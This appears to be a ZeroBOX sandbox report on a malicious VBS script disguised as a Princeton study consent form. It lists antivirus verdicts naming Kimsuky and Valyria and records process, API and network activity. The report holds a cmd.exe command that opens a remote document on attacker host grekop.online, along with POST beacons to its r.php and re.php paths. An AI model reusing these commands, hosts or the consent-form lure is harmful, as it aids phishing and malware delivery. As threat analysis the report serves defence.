Summary | ZeroBOX

Consent Form_Princeton Study.vbs

Antivirus
Category Machine Started Completed
FILE s1_win7_x6402 Aug. 17, 2023, 10:37 a.m. Aug. 17, 2023, 10:39 a.m.
Size 34.3KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 ca8728ce8f77cfc804f9ce343de9c9ee
SHA256 470027cf8dd33b201b465b109a9876d0a75667be907af770eb76ff5798496ae4
CRC32 249E824B
ssdeep 384:GrquVS33hr8nIsbSQVwooxqKqJhY/CA7+s8S5iRGUMgLO27gwZCbo6u:GugSBrwIBQVwoMqKqJhY/txOZCbI
Yara
  • Antivirus - Contains references to security software

Name Response Post-Analysis Lookup
grekop.online 63.250.38.85
IP Address Status Action
117.18.232.200 Active Moloch
164.124.101.2 Active Moloch
63.250.38.85 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
request GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
cmdline "C:\Windows\System32\cmd.exe" /c explorer "https://grekop.online/brad/share.docx"
cmdline cmd.exe /c explorer "https://grekop.online/brad/share.docx"
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c explorer "https://grekop.online/brad/share.docx"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: ?
parameters: v??X????
filepath: ?
0 0
host 117.18.232.200
Time & API Arguments Status Return Repeated

InternetCrackUrlW

url: https://grekop.online/brad/r.php
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 81788928
http_method: POST
referer:
path: /brad/r.php
1 13369356 0

InternetCrackUrlW

url: https://grekop.online/brad/re.php
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 81788928
http_method: POST
referer:
path: /brad/re.php
1 13369356 0
ALYac VB:Trojan.Valyria.8377
Symantec ISB.Downloader!gen407
ESET-NOD32 VBS/Kimsuky.Y
BitDefender VB:Trojan.Valyria.8377
NANO-Antivirus Trojan.Script.Vbs-heuristic.druvzi
MicroWorld-eScan VB:Trojan.Valyria.8377
Emsisoft VB:Trojan.Valyria.8377 (B)
VIPRE VB:Trojan.Valyria.8377
McAfee-GW-Edition BehavesLike.VBS.Dropper.nv
FireEye VB:Trojan.Valyria.8377
GData VB:Trojan.Valyria.8377
Arcabit VB:Trojan.Valyria.D20B9
MAX malware (ai score=83)
Time & API Arguments Status Return Repeated

InternetCrackUrlW

url: https://grekop.online/brad/r.php
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 81788928
http_method: POST
referer:
path: /brad/r.php
1 13369356 0

send

buffer: !
socket: 1076
sent: 1
1 1 0

send

buffer: pldÝyåkNhfMŠ2”o#G0n<'3åä’SSÚú¶/5 ÀÀÀ À 28+ÿ grekop.online  
socket: 1152
sent: 117
1 117 0

send

buffer: !
socket: 1076
sent: 1
1 1 0

send

buffer: !
socket: 1076
sent: 1
1 1 0

send

buffer: pldÝyå^{ÖbžÉ¸áþm®Ý›ÎÁ†ä3ÀÔ& ÁE‘/5 ÀÀÀ À 28+ÿ grekop.online  
socket: 1168
sent: 117
1 117 0

send

buffer: !
socket: 1076
sent: 1
1 1 0

send

buffer: !
socket: 1076
sent: 1
1 1 0

send

buffer: 51dÝyæÍüj$òæÿ•` ŽŠ VmdƒñKÇ´7\†–÷Ñ  ÿ
socket: 1168
sent: 58
1 58 0

send

buffer: !
socket: 1076
sent: 1
1 1 0

send

buffer: !
socket: 1076
sent: 1
1 1 0

InternetCrackUrlW

url: https://grekop.online/brad/re.php
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 81788928
http_method: POST
referer:
path: /brad/re.php
1 13369356 0

send

buffer: !
socket: 1076
sent: 1
1 1 0

send

buffer: pldÝyæýþћöƜ%ö/Ʀü=n)Ö * &År/5 ÀÀÀ À 28+ÿ grekop.online  
socket: 1284
sent: 117
1 117 0

send

buffer: !
socket: 1076
sent: 1
1 1 0

send

buffer: !
socket: 1076
sent: 1
1 1 0

send

buffer: pldÝyçŒ{ʺH.+yŠ<çހ%‡U!EsÚ7ªÇܬy8/5 ÀÀÀ À 28+ÿ grekop.online  
socket: 1284
sent: 117
1 117 0

send

buffer: !
socket: 1076
sent: 1
1 1 0

send

buffer: !
socket: 1076
sent: 1
1 1 0

send

buffer: 51dÝyç­Î¸îUÿüöõjòJ«ËmVèŒ÷ËNÒ˜+3º"  ÿ
socket: 1284
sent: 58
1 58 0

send

buffer: !
socket: 1076
sent: 1
1 1 0

send

buffer: !
socket: 1076
sent: 1
1 1 0
parent_process wscript.exe martian_process ? v??X????
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c explorer "https://grekop.online/brad/share.docx"
parent_process wscript.exe martian_process cmd.exe /c explorer "https://grekop.online/brad/share.docx"
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 156
thread_handle: 0x00000084
process_identifier: 200
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\explorer.exe
track: 1
command_line: explorer "https://grekop.online/brad/share.docx"
filepath_r: C:\Windows\system32\explorer.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0
file C:\Windows\System32\cmd.exe